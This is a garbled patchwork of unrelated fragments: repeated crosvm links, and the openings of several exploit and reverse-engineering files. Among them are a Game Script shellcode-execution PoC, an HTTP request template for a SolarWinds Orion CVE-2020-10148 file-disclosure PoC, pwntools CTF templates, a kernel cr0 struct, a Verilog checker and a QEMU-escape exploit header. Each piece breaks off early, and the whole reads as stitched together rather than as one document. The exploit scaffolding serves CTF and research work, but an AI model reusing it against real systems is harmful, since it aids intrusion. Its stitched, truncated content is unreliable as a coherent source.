https://chromium.googlesource.com/chromiumos/platform/crosvm
https://www.collabora.com/news-and-blog/blog/2017/11/09/quick-hack-experiments-with-crosvm/
You can also skip this step and use the kernel image already installed on your Ubuntu host (the vmlinuz under /boot) instead of building one.
// native code exec PoC via Game Script - @carrot_c4k3 (exploits.forsale)
//
// sample shellcode: mov rax, 0x1337; ret;
// drop your own shellcode inplace here
// The bytes below are the x86-64 encoding of the sample above:
//   48 C7 C0 37 13 00 00  mov rax, 0x1337
//   C3                    ret
let shellcode = [0x48,0xC7,0xC0,0x37,0x13,0x00,0x00,0xC3]
// hex printing helper functions
// nibble value (0..15) -> uppercase hex digit
let i2c_map = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']
// uppercase hex digit -> nibble value. NOTE(review): only uppercase keys are
// defined, so any lowercase hex input must be upper-cased by the caller first.
let c2i_map = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, 'A': 0xA, 'B': 0xB, 'C': 0xC, 'D': 0xD, 'E': 0xE, 'F': 0xF}
| POST /api/Action/TestAction HTTP/1.1 | |
| Host: <target> | |
| Content-Length: 3978 | |
| Accept: application/json, text/javascript, */*; q=0.01 | |
| X-XSRF-TOKEN: <token> | |
| X-Requested-With: XMLHttpRequest | |
| ViewLimitationID: 0 | |
| User-Agent: Mozilla/5.0 | |
| Content-Type: application/json; charset=UTF-8 | |
| Cookie: <cookie> |
# CVE-2020-10148 -- local file disclosure PoC for SolarWinds Orion
# (the Orion API authentication bypass suspected as the entry point for SUPERNOVA? see VU#843464)
# @0xSha
# (C) 2020 0xSha.io
# Advisory   : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details    : https://kb.cert.org/vuls/id/843464
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
| # Reverse engineering tricks: | |
| # Determine load addresses using differences between string references | |
| # (c) 2017 Comsecuris UG | |
| from idc import * | |
| from idautils import * | |
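# The `sets` module exists only on Python 2 (removed in Python 3.0). IDAPython
# on current IDA releases runs Python 3, where the builtin `set` is the drop-in
# replacement; keep the `Set` name so the rest of the script is unchanged.
try:
    from sets import Set
except ImportError:
    Set = set

# NOTE(review): presumably a retry bound for the load-address search described
# in the header; where it is consumed is not visible in this excerpt.
ATTEMPTS = 10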
// Checker circuit: asserts `res` only for one ordered pair of 20-bit factors.
module top(
    input [19:0] a,
    input [19:0] b,
    output res
);
    // Expected product; equals 238247 * 628861.
    localparam [39:0] TARGET = 40'd149824246667;

    // A 20x20-bit multiply needs at most 40 bits, so nothing is truncated here.
    wire [39:0] product = a * b;

    // Requiring a < b rejects the swapped factor order.
    assign res = (product == TARGET) && (a < b);
endmodule
https://chromium.googlesource.com/chromiumos/platform/crosvm
https://www.collabora.com/news-and-blog/blog/2017/11/09/quick-hack-experiments-with-crosvm/
You can also skip this step and use the kernel image already installed on your Ubuntu host (the vmlinuz under /boot) instead of building one.
| //this requires being able to run at kernel mode and assumes you're using MSVC | |
| //this also uses an unnamed structure for cr0_t, which is a nonstandard extension of the C language | |
| //data structure for cr0 | |
| typedef union _cr0_t | |
| { | |
| struct | |
| { | |
| uint64_t protection_enable : 1; |
#!/usr/bin/env python
from pwn import *

# Open the pwntools debugger/terminal in a side-by-side tmux pane.
context.terminal = ['tmux', 'splitw', '-h']

# Parse the target binary; its architecture comes from the ELF header.
# libc = ELF('')
elf = ELF('./kamikaze')
context.os = 'linux'
context.arch = elf.arch

# Uncomment for verbose pwntools logging.
# context.log_level = 'debug'
#!/usr/bin/env python
from pwn import *

# Open the pwntools debugger/terminal in a side-by-side tmux pane.
context.terminal = ['tmux', 'splitw', '-h']

# Parse the target binary; its architecture comes from the ELF header.
# libc = ELF('')
elf = ELF('./hash_man')
context.os = 'linux'
context.arch = elf.arch

# Uncomment for verbose pwntools logging.
# context.log_level = 'debug'
| // | |
| // Exploit for the EC3 qemu escape challenge of Defcon CTF Qualifiers 2018 | |
| // | |
| // Also see https://kitctf.de/writeups/hitb2017/babyqemu | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| #include <fcntl.h> | |
| #include <inttypes.h> |